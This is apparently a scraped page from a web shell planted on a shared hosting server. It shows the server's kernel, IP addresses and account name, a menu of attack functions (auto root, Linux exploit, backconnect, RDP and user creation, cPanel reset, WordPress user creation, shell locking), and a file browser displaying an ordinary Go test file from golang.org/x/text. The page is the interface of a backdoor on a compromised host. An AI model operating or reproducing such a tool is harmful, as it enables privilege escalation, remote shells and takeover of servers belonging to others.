Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
text@v0.14.0 /
message /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
dr-xr-xr-x
pipeline
[ DIR ]
dr-xr-xr-x
catalog.go
1.13
KB
-r--r--r--
catalog_test.go
1.03
KB
-r--r--r--
doc.go
3.49
KB
-r--r--r--
examples_test.go
2.05
KB
-r--r--r--
fmt_test.go
57.87
KB
-r--r--r--
format.go
11.97
KB
-r--r--r--
message.go
4.59
KB
-r--r--r--
message_test.go
5.49
KB
-r--r--r--
print.go
23.24
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catalog_test.go
// Copyright 2017 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package message import ( "strings" "testing" "golang.org/x/text/language" "golang.org/x/text/message/catalog" ) func TestMatchLanguage(t *testing.T) { c := catalog.NewBuilder(catalog.Fallback(language.English)) c.SetString(language.Bengali, "", "") c.SetString(language.English, "", "") c.SetString(language.German, "", "") saved := DefaultCatalog defer func() { DefaultCatalog = saved }() DefaultCatalog = c testCases := []struct { args string // '|'-separated list want string }{{ args: "de-CH", want: "de-u-rg-chzzzz", }, { args: "bn-u-nu-latn|en-US,en;q=0.9,de;q=0.8,nl;q=0.7", want: "bn-u-nu-latn", }, { args: "gr", want: "en", }} for _, tc := range testCases { t.Run(tc.args, func(t *testing.T) { got := MatchLanguage(strings.Split(tc.args, "|")...) if got != language.Make(tc.want) { t.Errorf("got %q; want %q", got, tc.want) } }) } }
Close